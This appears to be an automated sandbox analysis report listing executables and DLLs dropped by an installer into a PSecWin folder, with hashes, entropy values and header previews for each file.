                              SSDEEP:3072:AeJBynLxPazkW2WK0GrQ/EKkSCwL0Yt6OpIDn/DkSnhzSnhwbf:AkynLxCzd2QGXKk9wQYEQID/DnWE
                              MD5:74F5569F0A9F686A31171D0C7339A403
                              SHA1:FB33C76CF931317C41314374120EBAA1C6E34849
                              SHA-256:4394B0AE396B1001671C6748DA7B60B4CF9746A66DC1D83CD68CF0D5853750E7
                              SHA-512:8C9849C394D4917C5EA2B0D26AFFE4CC02E88DDDA9A7789CE627BF5F1872AED270B7603D68670CE828CF9D87621373D9FE6391FC6B293E51D1350E095D30F9D7
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........p..#..#..#..)#...#.."..#..#..#.."..#.."..#.."..#.."..#.."..#..E#..#.."..#Rich..#........PE..L...W.#............!.........4......@..............s......................................@A............................k...8...X...................................."..T...................d...........................4............................text............................... ..`.data...............................@....idata........... ..................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-MGUI8.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):8704
                              Entropy (8bit):4.810621720665765
                              Encrypted:false
                              SSDEEP:96:9MSvZiG2+XZ9PIzWIY+0y1/wbaDQzf7qfBS9nFJEcMYZcEWIdWwWZ2f:PfJsW7+0AHGfWfBqn7Ec3ZtWIdWH0
                              MD5:8881F8445B35C24DC307561809E15A4A
                              SHA1:1B76C7657AAEAAC45D39B837E2131B5B4113F599
                              SHA-256:0CBEB415A66083408897C5C8D404BFA2B32132CC49C203969125A106AE2C0520
                              SHA-512:3B6C764896F9EA30E1BE38496AAF6F16507034D9AE8D6B87046A9A69197061E56657A1E6FB7A1F57E77E73F93CF962E8F122577AED78FE55D984D37554F176A1
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K...........;...........................................W..........Rich...........................PE..L....\.............!................`........ .....t.........................`.......t....@A............................H...d0.......@.......................P..4.......T............................................0..`............................text...8........................... ..`.data...P.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..4....P....... ..............@..B................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-MHHB2.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):80896
                              Entropy (8bit):6.243895837934394
                              Encrypted:false
                              SSDEEP:1536:U5i0hBmMsWjcdIkpk0551bBuej8LrdHNaAssqeyAiBTd9aFZBrx7WwE45:UhBGIkV71bBuEmrIsqeyAiBTdCBrpWwr
                              MD5:CAE8E531CD82401A9ECB4C446CBB964B
                              SHA1:60F23D6F5BAEA091C997DC7527C0F2896C801F6F
                              SHA-256:F5FBD701E0CEEFCAB76839231C23F29EB967AD6107520B8454C40FD8DCDDFDE1
                              SHA-512:0D87C7C6797312286AB141AF5260BA8E6A3DE98A51617AFF9F7D1DC149B239FA04E26F87B72FB7E4BC387566317C8801A62D50E953F0872A8790EB5B9D8F7932
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7..s...s...s...g...Q...g...h...g...t...s.......g...q...g.......g.|.r...g...r...Richs...........PE..L...!.......................6......0e....... ....@..........................p...........@...... ...........................A..P....P.......................`......PU..T............................!...............@...............................text............................... ..`.data........ ......................@....idata..L....@......................@..@.rsrc........P.......&..............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-N73AH.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):17408
                              Entropy (8bit):5.099127756403988
                              Encrypted:false
                              SSDEEP:192:lzZ1jWp6XwpkG1ThzQosFRi2gKp8W+YAUtpu1KAgsPzKbMq/YWqB/WcNwGOUf:De9Nhei2gS8W+YAUts1V2oPWqB/WEOU
                              MD5:BE2A0F4DFE1DF0C0A095C05787421510
                              SHA1:521A6F5F4268C0E560075F81760AFED0E22E9C56
                              SHA-256:B46D21E8758624D184A063B2C021AEFFF45CA0C33AECC8840829F16E8E32B43A
                              SHA-512:60955C89F4E56FDA473CF756C04B75B59AFFCF8600380ABA3E12DC41B6E0B370FF04B6320D05FFECBDD7994455796B1CD7DA96BBBCF4948DFE74C3B75974296D
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=..y..y..y..m...x..m...u..y..E..m...r..m...x..m...z..m.X.x..m...x..Richy..................PE..L....[*7...........!.................3.......@......................................~n....@A........................ =.......P..x....`..8....................p.......-..T...........................P...@............P...............................text....-.......................... ..`.data........@.......2..............@....idata.......P.......4..............@..@.rsrc...8....`.......:..............@..@.reloc.......p.......@..............@..B................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-NRIH7.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):88576
                              Entropy (8bit):6.314245127753692
                              Encrypted:false
                              SSDEEP:1536:mw7cep4vTkKL9El0Zsl/0W7f1/D5cigpoFTtOxGtIWo4fv0vwcQ:mLepXKBPW7f1BgmFTt24fKwcQ
                              MD5:EC617981C8A1ECFD4E982DC222D702C4
                              SHA1:08662D14313DF78CD3A62FEDA10673FA61DE93B4
                              SHA-256:8507C144A2C8A734AF66A8BE601B819943F931EF31A5244381DB359AB7714BB1
                              SHA-512:126B30D460DB356AD83C848B18F885032FB7C55483E51D9096BD172839E07FF1063B796BC2E3DFE8596A192AAA9C80D054441F2CAFEBB05F53421CE94F2D6A62
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........OC...C...C...J.W.....W...@...C.......W...F...W...O...W...B...W...N...W..._...W.9.B...W.;.B...W...B...RichC...........PE..L.....I............!..... ...:...... ........0.......................................=....@A........................ /..x...8B..X....p...............................(..T...........................h................@..4....-.......................text............ .................. ..`.data........0.......$..............@....idata.......@.......(..............@..@.didat..$....`.......<..............@....rsrc........p.......>..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-O0GNS.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):264992
                              Entropy (8bit):6.422639874613466
                              Encrypted:false
                              SSDEEP:6144:4i7RSMUw32CszCxRBL17SxvZiPk7H0FsoTVC7Rr:b9p25z+J7v8H0Fso2Rr
                              MD5:5F5E63F6EB6BADA4051AE5B3ADE35C95
                              SHA1:9925C1A5DD98CC0D24F2DB35E75C6FA3512B6BB0
                              SHA-256:5B40BE2B83DE58C9C787D9E97D218EC3CECECEE30CA884CD7A3B45D60A9F2FD9
                              SHA-512:7835DD94B14286FB55EEADCDF1C675C3674A3AE1F94D5A4DB141D9C08E2423EF70DC18C48FFD1EADEB2BFB37D89E435268D80C4E41DA771E0123AC87BBB1C3A0
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4/W.Z|W.Z|W.Z|^..|u.Z|C.^}X.Z|W.[|..Z|C.[}P.Z|C._}U.Z|C.Y}S.Z|C.Z}V.Z|C.S}r.Z|C..|V.Z|C.X}V.Z|RichW.Z|................PE..L..................!.........|...............................................@.......@....@A........................p.......`...........H............... /... .......'..T...............................................\.......`....................text...-........................... ..`.data...0J.......&..................@....idata..............................@..@.didat..............................@....rsrc...H...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-P56QD.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):70224
                              Entropy (8bit):5.147993943292643
                              Encrypted:false
                              SSDEEP:1536:MV9zfyEBAuhPLNXf/nWHNfdzd+zLZKzyF:Q9zlBhZxXf/nWHNdAok
                              MD5:DADB101E49A2CD1F0451AA7762D4B83C
                              SHA1:E2DDB718652E3276244F16BE562E07925ED2623A
                              SHA-256:5EE1FE1A80A2294DB5719502D1E089B0B18AB202B617157D114039789A9A396E
                              SHA-512:C16B9B52B0CB1A0CB127D040681A0381236121BA33EB2DA3AD728109EA79C0B335CAF8FB7912AF050409D0FB5690C959C9113EF26E98FBEA4E9C5BD1173AC8AA
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}Y=.98S.98S.98S.?...88S.?.Q.88S.Rich98S.................PE..L................."!...&.............................................................^....@.......................................... ..................PP..............T............................................................................text...P...........................@..@.rsrc........ ......................@..@................T...l...l...................l...........................$...,...,...........................RSDS\..V....4O(...n.....D:\a\_work\1\s\binaries\x86ret\bin\i386\\MFC140ENU.i386.pdb.........T....rdata..T........rdata$voltmd...l........rdata$zzzdbg.... ..p....rsrc$01....p1..0....rsrc$02.... ...\..V....4O(...n.....d.,t.t..............................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-PBFIO.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):360144
                              Entropy (8bit):5.661023715516949
                              Encrypted:false
                              SSDEEP:3072:jCuEydZX7mwKR4L5QprdZvh+h9H7WwfNfZ/CTla1nSrm9W0fQx78qYFQxV3Zsd8+:9EYZXqwKR4lQpr/GDCk3fQxUt9+C
                              MD5:B08196E5863137C12CA5BF166F16AAC7
                              SHA1:A5EEDE1F86B4DBF8EB920FA4B74C03FFAA19847C
                              SHA-256:2379C89382789238DCAE1433C04EEB861A2AB72955EC67D7554F4889AF2788C3
                              SHA-512:ACAB6898ADB05CFD15A60B5248AD4E4C4763EB30BF32A872FE05E2FE29D663E37B7DFC812A5AA66D300AFF3178F045F10A3EA4231DD6B41BFC8BBDFDC6E7C3F4
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ F..A(..A(..A(..*+..A(..*)..A(..A).BA(..*,..A(..*(..A(..* ..A(..*...A(..**..A(.Rich.A(.................PE..L....C1............!.........t...............................................P............@A...........................B...h...(.......`............P....... ..L+...^..T...........................(...................`............................text............................... ..`.data.... .......\..................@....idata..8...........................@..@.rsrc...`...........................@..@.reloc..L+... ...,...$..............@..B................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-PGRCJ.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):21504
                              Entropy (8bit):5.437181553041295
                              Encrypted:false
                              SSDEEP:384:ATE5/wpuI8sgqzptH/b3wGK0LTOefJoJA1FwPWuxWp:NmjppbNlxfJoJALwZe
                              MD5:3417CBAB13CD103B5AEE4D4EF297C240
                              SHA1:2BBBB44DD6592701B749DC352A98DBA7642712F2
                              SHA-256:5BEB57FFFC92BCB5FBD8AFD8B2E09EDAE93E895BB9A4604C010EB377930813AD
                              SHA-512:5A14F422D5E5F292C914D07A083E736B1F33D7CF98C72388F87488C431379FBC70CACB1DC25A97B3887FC35E1E9B7ACF03A9329B355001F7CCAACB0D5CA0F2E3
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;&...G.P.G.P.G.Pv?ZPiG.Pk,.Q~G.Pk,.QrG.P.G.PFG.Pk,.QzG.Pk,.Q|G.Pk,.Q~G.Pk,.Q|G.Pk,6P~G.Pk,.Q~G.PRich.G.P........................PE..L...V.P...........!.....8.......... ........P......................................r.....@A.........................>.......`..........`...............................T...........................p................`.......=..`....................text....7.......8.................. ..`.data........P.......<..............@....idata.......`.......>..............@..@.didat.......p.......H..............@....rsrc...`............J..............@..@.reloc...............P..............@..B................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-PSU9B.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):3.82952728424198
                              Encrypted:false
                              SSDEEP:384:pWpSW07HJYHZSxRswpfPFx2AmfN3IsK717:EQWsxRs6EIN
                              MD5:6F47F9FF734CCE033CF391591D688046
                              SHA1:04CCC2769E17BAE55709BFCAB9AE05EAA88C3947
                              SHA-256:BD21573B6554300E6DDC77269FBE7BEB1D32A6AACAA3CC872703AA0F73E68D66
                              SHA-512:652DF8A984535103C3DBD9044E84EF2FAB3335810E3C55CCB64A4DA42F1ABC0ADCED75F8585EA2452D9DA9EE907E3CDCC8F3C9A2AF720E237BF640B77C523B03
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L................!.........N....................hD.........................p.......I....@.......................................... ...K..............................8............................................................................text...............................@..@.rsrc....K... ...L..................@..@..............T...8...8.................$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....!...J...rsrc$02.... ............<l.;.aJD..-.V.V............................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-QSA3H.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):4096
                              Entropy (8bit):4.139121993350808
                              Encrypted:false
                              SSDEEP:48:yZ/5Q4Ja0Y+0IeaRiCn5yXHUhQqSA6AqzrtEIZWXoXuV25WwHg:ohJr0IeQ5yXuQhrmEWYQmWw
                              MD5:E32319E5947A76F8E50EC50C37906882
                              SHA1:135A1ED2ADD1E8DDFF0920DF82E57078CA3CBD06
                              SHA-256:2A900AC21B85E6E32A502F24B804D8796A0D148B513D449AB4384323846D7DA9
                              SHA-512:5DEFF824DC784CDD44AE7C76B53EB9D212D1D9D2199F23D766325A2702180963BF52C40C6CC095C1F1584B2918DC9A7F4EEA7320904CAD147B48CD0A7F7584C0
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........PE..L.................!..............................8N.........................0......z.....@E........................`...0............ .. ...............................T............................................................................text...<...........................@..@.rsrc... .... ......................@..@...............$..........................d..........................$..................................x.......................H...............>...i...............@...z...........=...v...............5...p...............I...x...............)...Z...............*...]..........."..._...............!...P...............2...g...................................................WS2HELP.dll.WahCloseApcHelper.ws2_32.WahCloseApcHelper.WahCloseHandleHelper.ws2_32.WahCloseHandleHelper.WahClose

                              C:\Users\user\AppData\Roaming\PSecWin\is-U20SU.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):615424
                              Entropy (8bit):6.486463968251161
                              Encrypted:false
                              SSDEEP:6144:9LBMhWV4vkP/vhYsCrnLtnG3Fypb2dZjD0L9XlZXzfUD+ml5oCEGcmC0W0qj9rnv:9LBMhWV4vkPis8nLlY6k+mTBCtmA
                              MD5:6A2E421022720242F2275E9C2011C185
                              SHA1:03FEFC6077DC0AE418F74C344C44AEB8E9140CE7
                              SHA-256:C83C9F5BE7ADAC1820C54A4B345E91745EA7F46990855E0C1A39A35FF27AE2ED
                              SHA-512:DF8A5D8350F7C366AAA417DC5E0A326C66DB6037527C1664912F2ADFAA8AADE142F0589E358AF9E2D9811756B5F6E10730E543804524B9B9C91234D2E788463C
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........E.k.E.k.E.k.L...}.k.Q.h.@.k.Q.o.I.k.E.j..k.Q.j.B.k.Q.k.D.k.Q.b.T.k.Q.n.X.k.Q...D.k.Q...D.k.Q.i.D.k.RichE.k.................PE..L....."............!.....F... ......0........`.......................................>....@A.........................T.........X.......h........................... y..T....................m...... m...............................................text...1E.......F.................. ..`.data........`.......J..............@....idata...............`..............@..@.rsrc...h............~..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-UI7FB.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):37376
                              Entropy (8bit):5.313827090823637
                              Encrypted:false
                              SSDEEP:768:hpT8dTrLIdc5DGhZgItQwWgGjG1al2YjZ/2:hpAdTrLIdc5DGhZgItTXGcaLjZ/2
                              MD5:2422934B02194D962E3891D91DFF50C8
                              SHA1:7E00DF40C44ABC1077424CAF084494507FFF726F
                              SHA-256:313B1EB5A6DE86E234FCB18A6AA4AE75FFECB9243BDEC7F34253A7FCC9F29FC0
                              SHA-512:6E1F4C7CFA87A4576A5F943AF5B84B9BEADE8FFEA36CB94A03461F338C36C6647D074DBA4B5E160D75018762E5448A193FE59E0D2662DC6FCD24FEDAB45AC256
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........sP.n...n...n.......n.......n.......n...n...n.......n.......n.......n.......n.......n..Rich.n..........PE..L...[..............!.....n...$.......m...............................................M....@A........................P{......D........................................0..T...........................(...................@............................text....l.......n.................. ..`.data...H............r..............@....idata...............t..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-ULHI4.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):709120
                              Entropy (8bit):5.992581602394087
                              Encrypted:false
                              SSDEEP:12288:8myV/tTB9ef3BvRy9NNPI0+DCksfBzu9KRAAJ3jqG3nSgrfhbeqLf:vyFt3efBvRy9NNPItCkGuqLRjx3nSgLN
                              MD5:B0027D5280E1D7EFFC0B9A1E94A6F94C
                              SHA1:6762909AEA5F77A0F7818DFA1BB0E2208732BAFD
                              SHA-256:E06519F29B149D64D534A19FA1F6A31066F4B68FB700CEDB4FB0A9921D79EBBD
                              SHA-512:04EC97501B91D342DCEF34C9AD3ABEEB477B72ADEFA574F10650E886EC011120BE7C5574EF02489FD3CE0F51FE6F2DE0D9AE6FD83A3FBB077DC0985A920755AA
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+..J...J...J...!...J...2...J...J...L...!...J...!...J...!...J...!...J...!...J...!}..J...!...J...!...J..Rich.J..................PE..L.....c............!................pw.............P.........................0............@A........................P...:....G..`................................a......T............................................@..........@....................text............................... ..`.data....*..........................@....idata...C...@...D..................@..@.didat..d............X..............@....rsrc................\..............@..@.reloc...a.......b...p..............@..B................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\is-USCFG.tmp

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):47104
                              Entropy (8bit):6.2437778672689985
                              Encrypted:false
                              SSDEEP:768:A686/iNXC+tFbpTSRkg3AAdYn7AJUeuFRseJgvDwzcQx8Z499:Av6/iNXXDuX7meUeuFKrvcJaZ49
                              MD5:7801A2F01B7F0163DA0088B1E666A573
                              SHA1:C4D91352CFA440C2EC7018A412B8C3DABC0DC905
                              SHA-256:62B4D125AE01FD97C91AFC55238E15D643CC4DB92F990D9D5C40C0C62FA270F3
                              SHA-512:992CA7A0E75E7AC64AA43040C98A32C50566376F754B8EEA08993F235D816DDF6C9A97FB221C01230C26AF6ACC3113DC7C0541FBE011BCA1A947F32BCA93ABEE
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.2.g.\.g.\.g.\.n...K.\.s.X.q.\.s.Y.b.\.s._.d.\.s.].r.\.g.]..\.s.T.s.\.s..f.\.s.^.f.\.Richg.\.........................PE..L...M........................:...... .............@.................................K.....@...... ......................................x............................#..T...............................................|............................text............................... ..`.data...$...........................@....idata..8...........................@..@.rsrc...x...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\kbd101b.DLL (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):7168
                              Entropy (8bit):3.235992661119672
                              Encrypted:false
                              SSDEEP:96:vzC1kenzketFbwXmybNcqDWrtayWwqe2WwrP:7NenzketBsKWi2Wm
                              MD5:62CCA1467B39187CA5FBFFEDE02B3895
                              SHA1:3F1C1BBB28A96522AB953C370E66C107C911201B
                              SHA-256:3D166684470988E9F73250C62AE6E7BA9194ACD2D3247AA772B8FFD4AEF10FA8
                              SHA-512:A5A903DD0DA242F0B33A5887AB204956C93A1968C409DD2DBDF433024D12C14814135475FBBFA2976BE16C25A484EC4AE11DD95DC065D5A16FE19FE2D784E836
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\...\...\...\...\...X...\.....\...^...\.Rich..\.........................PE..L.....&R...........!......................... .....R.........................@......."....@.........................P................ .. ....................0..........T............................................................................data............................... ..`.rsrc... .... ......................@..B.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\kbdarmty.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):7168
                              Entropy (8bit):3.3223098820671386
                              Encrypted:false
                              SSDEEP:96:vQe1aIVBryn6fUuX8CMrn746XQdyNcTq0c5YW9/Ww+:oe1aIqAXsVn/XFrYW9/W
                              MD5:0625662B4B33D2A78C39366CA3E66067
                              SHA1:7F57F3A63835268F5B91F743BB9B00F759C60F99
                              SHA-256:CE7D17C4DDD3DD4C969556FF8286A01D52986D13CDD9371BE363F3BFB382C4A9
                              SHA-512:9F788AA83A52C3F487506D105F564074358D0F693D6EE2BF5358EE5E2583BA3ACF85B95E4476DE8AC6AA097DAE3724C648D6E5A5A9F22B9E6221A68E120F8F6B
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\...\...\...\...\...X...\.....\...^...\.Rich..\.........................PE..L....#.............!......................... ...............................@......Z.....@E............................T............ .. ....................0..........T............................................................................data...W........................... ..`.rsrc... .... ......................@..B.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\kbdibm02.DLL (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):7680
                              Entropy (8bit):3.341098387319522
                              Encrypted:false
                              SSDEEP:48:qoQFOfuKNkpBBhXbVc1u79I+nNNKDzVUNcO1Hy0uFdbocZWPWAuVc5WwHgHq:vQh+kvbbVx9IS4DyNcO1HydFzWsAWwy
                              MD5:110BB11112903EE1BECE36BABA256754
                              SHA1:C0ABCC794F35D6AEB0A2349BAC890BC8BFC47F0A
                              SHA-256:81A6E79F3AC731BB3C7EFBDCAF18DF7662964B8E7907018B1B4551F3562F1B66
                              SHA-512:4EC8E3BF67A73141AB62DA26CE45E5DA170D994A5ECF7A99252F5B58C016B320BDA97BF9FF9AD028B45E9560FDFDE1064046695E3CE930D2EC71473027DC3379
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\...\...\...\...\...X...\.....\...^...\.Rich..\.........................PE..L...'a%............!.........................0.....R.........................P.......A....@..........................................0..0....................@......@ ..T............................................................................data............................... ..`.rsrc...0....0......................@..B.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\mcbuilder.exe (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):80896
                              Entropy (8bit):6.243895837934394
                              Encrypted:false
                              SSDEEP:1536:U5i0hBmMsWjcdIkpk0551bBuej8LrdHNaAssqeyAiBTd9aFZBrx7WwE45:UhBGIkV71bBuEmrIsqeyAiBTdCBrpWwr
                              MD5:CAE8E531CD82401A9ECB4C446CBB964B
                              SHA1:60F23D6F5BAEA091C997DC7527C0F2896C801F6F
                              SHA-256:F5FBD701E0CEEFCAB76839231C23F29EB967AD6107520B8454C40FD8DCDDFDE1
                              SHA-512:0D87C7C6797312286AB141AF5260BA8E6A3DE98A51617AFF9F7D1DC149B239FA04E26F87B72FB7E4BC387566317C8801A62D50E953F0872A8790EB5B9D8F7932
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7..s...s...s...g...Q...g...h...g...t...s.......g...q...g.......g.|.r...g...r...Richs...........PE..L...!.......................6......0e....... ....@..........................p...........@...... ...........................A..P....P.......................`......PU..T............................!...............@...............................text............................... ..`.data........ ......................@....idata..L....@......................@..@.rsrc........P.......&..............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\mfc140enu.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):70224
                              Entropy (8bit):5.147993943292643
                              Encrypted:false
                              SSDEEP:1536:MV9zfyEBAuhPLNXf/nWHNfdzd+zLZKzyF:Q9zlBhZxXf/nWHNdAok
                              MD5:DADB101E49A2CD1F0451AA7762D4B83C
                              SHA1:E2DDB718652E3276244F16BE562E07925ED2623A
                              SHA-256:5EE1FE1A80A2294DB5719502D1E089B0B18AB202B617157D114039789A9A396E
                              SHA-512:C16B9B52B0CB1A0CB127D040681A0381236121BA33EB2DA3AD728109EA79C0B335CAF8FB7912AF050409D0FB5690C959C9113EF26E98FBEA4E9C5BD1173AC8AA
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}Y=.98S.98S.98S.?...88S.?.Q.88S.Rich98S.................PE..L................."!...&.............................................................^....@.......................................... ..................PP..............T............................................................................text...P...........................@..@.rsrc........ ......................@..@................T...l...l...................l...........................$...,...,...........................RSDS\..V....4O(...n.....D:\a\_work\1\s\binaries\x86ret\bin\i386\\MFC140ENU.i386.pdb.........T....rdata..T........rdata$voltmd...l........rdata$zzzdbg.... ..p....rsrc$01....p1..0....rsrc$02.... ...\..V....4O(...n.....d.,t.t..............................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\netevent.dll (copy)

                              Download File
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):3.82952728424198
                              Encrypted:false
                              SSDEEP:384:pWpSW07HJYHZSxRswpfPFx2AmfN3IsK717:EQWsxRs6EIN
                              MD5:6F47F9FF734CCE033CF391591D688046
                              SHA1:04CCC2769E17BAE55709BFCAB9AE05EAA88C3947
                              SHA-256:BD21573B6554300E6DDC77269FBE7BEB1D32A6AACAA3CC872703AA0F73E68D66
                              SHA-512:652DF8A984535103C3DBD9044E84EF2FAB3335810E3C55CCB64A4DA42F1ABC0ADCED75F8585EA2452D9DA9EE907E3CDCC8F3C9A2AF720E237BF640B77C523B03
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L................!.........N....................hD.........................p.......I....@.......................................... ...K..............................8............................................................................text...............................@..@.rsrc....K... ...L..................@..@..............T...8...8.................$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....!...J...rsrc$02.... ............<l.;.aJD..-.V.V............................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Roaming\PSecWin\netlogon.dll (copy)

                              Download File
